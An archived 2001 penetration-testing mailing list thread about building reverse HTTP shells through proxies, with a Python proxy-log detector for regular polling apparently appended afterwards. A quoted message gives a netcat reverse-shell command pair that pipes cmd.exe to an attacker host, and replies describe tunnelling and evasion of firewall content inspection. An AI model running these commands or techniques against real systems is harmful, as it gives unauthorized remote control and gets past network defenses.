RE: Reverse Http Shell Solution

From: David Sexton (dave.sextonat_private)
Date: Fri Oct 19 2001 - 01:05:34 PDT


    Hi,
    
    I can confirm that it is possible to hack nocrew's httptunnel
    program to provide a reverse tunnel. There is no reason that this would not
    work over an HTTP proxy.
    Once you have a reverse tunnel set up, you can use netcat to patch
    in a shell (or even build that functionality into the tunneling software).
    
    httptunnel (which provides a 'forward' tunnel) can be downloaded
    from: http://www.nocrew.org/software/httptunnel.html
    
    All it takes is a bit of code grafting between htc.c and hts.c.
    
    Regards,
    
    Dave
    
    > -----Original Message-----
    > From:	Frank Knobbe [SMTP:FKnobbeat_private]
    > Sent:	19 October 2001 02:56
    > To:	'GrandmastrPlagueat_private'; vdalesandroat_private
    > Cc:	'pen-testat_private'
    > Subject:	RE: Reverse Http Shell Solution 
    > 
    > -----BEGIN PGP SIGNED MESSAGE-----
    > Hash: SHA1
    > 
    > > -----Original Message-----
    > > From: GrandmastrPlagueat_private [mailto:GrandmastrPlagueat_private]
    > > Sent: Thursday, October 18, 2001 2:02 PM
    > > 
    > > It seems like this question has been asked a million times 
    > > before, but here goes the same old answer again... use netcat 
    > > On attacker machine: 
    > > nc -l -p 80 
    > > On victim machine: 
    > > nc -d -e cmd.exe attacker 80 
    > > 
    > > Make sure you set up the listening machine first. 
    > 
    > 
    > I believe Vinícius meant that there is no way for a straight-through
    > connection as netcat would establish, but instead the requirement to
    > send GET requests to the proxy which will fetch a page for you.
    > Netcat won't do that. You would have to have a reverse shell that
    > operates on an HTTP GET and PUT basis.
    > 
    > You could modify netcat to do that. Instead of using TCP/UDP
    > connections, you can replace that mechanism with HTTP GET and PUT
    > ways of shuffling data, pumping that back to stdin/stdout. The only
    > catch is to fetch the data correctly as some firewalls will do
    > content inspection. One way to get around that is to pump data with
    > POSTs to a form as normal, but receive data via GETs from images in
    > the web page, or just request images à la http://h4x0r/data.gif.
    > 
    > Regards,
    > Frank
    > 
    > -----BEGIN PGP SIGNATURE-----
    > Version: PGP Personal Privacy 6.5.8
    > Comment: PGP or S/MIME (X.509) encrypted email preferred.
    > 
    > iQA/AwUBO8+ILpytSsEygtEFEQIpdACfcW0ho5zq0dzoNYY0dWkId3qhhosAnjOo
    > 7M3sMCeCgjkYKDpMousASMQa
    > =MS16
    > -----END PGP SIGNATURE-----
    > 
    > --------------------------------------------------------------------------
    > --
    > This list is provided by the SecurityFocus Security Intelligence Alert
    > (SIA)
    > Service. For more information on SecurityFocus' SIA service which
    > automatically alerts you to the latest security vulnerabilities please
    > see:
    > https://alerts.securityfocus.com/
    
    
    
    Sapphire Technologies Ltd
    http://www.sapphire.net
    
    
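The thread's point from the defender's side is that a shell tunnelled over GET/POST still has to pass through the proxy, and the proxy log records every poll. The script below is an added example, not code from the thread or from httptunnel: it parses a constructed Common Log Format-style proxy log (the field layout, the `h4x0r.example` host, the client addresses and the thresholds are all assumptions) and flags client/URL pairs that are fetched at a near-constant cadence with small responses, which is what the "request an image such as data.gif" channel described above looks like from the proxy's vantage point. Ordinary browsing (varied URLs, large bodies) and a user reloading one page at irregular intervals are included as negatives.

```python
"""Flag regular small-response polling of one URL in proxy logs.

Added example for the pen-test thread above; not from httptunnel
or from any poster. Log layout, hosts, addresses and thresholds are
constructed assumptions for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev

# Common Log Format style line: client ident user [ts] "METHOD URL PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+)$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["bytes"] = int(rec["bytes"])
    return rec


def find_polling(lines, min_requests=6, max_cv=0.2, max_bytes=512):
    """Return (client, url, count, mean_gap_seconds) for each client/URL pair
    requested at least min_requests times, with inter-request gaps whose
    coefficient of variation is at most max_cv (steady cadence) and with no
    response larger than max_bytes (tiny "image" carrying a few commands)."""
    by_pair = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_pair[(rec["client"], rec["url"])].append(rec)

    hits = []
    for (client, url), recs in by_pair.items():
        if len(recs) < min_requests:
            continue
        recs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(recs, recs[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg  # 0 means perfectly periodic
        if cv <= max_cv and max(r["bytes"] for r in recs) <= max_bytes:
            hits.append((client, url, len(recs), round(avg, 1)))
    return hits


# ---- constructed sample log (assumed data, not a real capture) ----
def _line(client, ts, method, url, status, nbytes):
    return f'{client} - - [{ts.strftime(TS_FMT)}] "{method} {url} HTTP/1.1" {status} {nbytes}'


_BASE = datetime(2001, 10, 19, 2, 56, 0, tzinfo=timezone(timedelta(hours=-7)))
SAMPLE_LOG = (
    # polling channel: same small resource every 5 seconds
    [_line("10.0.0.5", _BASE + timedelta(seconds=5 * i), "GET",
           "http://h4x0r.example/data.gif", 200, 212) for i in range(8)]
    # ordinary browsing: varied URLs, large bodies
    + [_line("10.0.0.7", _BASE + timedelta(seconds=s), "GET",
             f"http://www.example/page{i}.html", 200, 15000)
       for i, s in enumerate([1, 4, 30, 31, 90, 200])]
    # a user reloading one small image at irregular intervals (should not fire)
    + [_line("10.0.0.9", _BASE + timedelta(seconds=s), "GET",
             "http://www.example/logo.gif", 200, 300)
       for s in [0, 3, 43, 45, 165, 172]]
)

if __name__ == "__main__":
    for client, url, n, gap in find_polling(SAMPLE_LOG):
        print(f"{client} polled {url} {n} times, every ~{gap}s")
```

The cadence test is deliberately simple (coefficient of variation of inter-request gaps) so that it runs over a plain log export; in a real deployment the same grouping would be applied per day and combined with the proxy's content-type and response-size fields, since a channel that hides data in POST bodies rather than GET responses shows up as regular small POSTs instead.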
    



    This archive was generated by hypermail 2b30 : Fri Oct 19 2001 - 10:15:26 PDT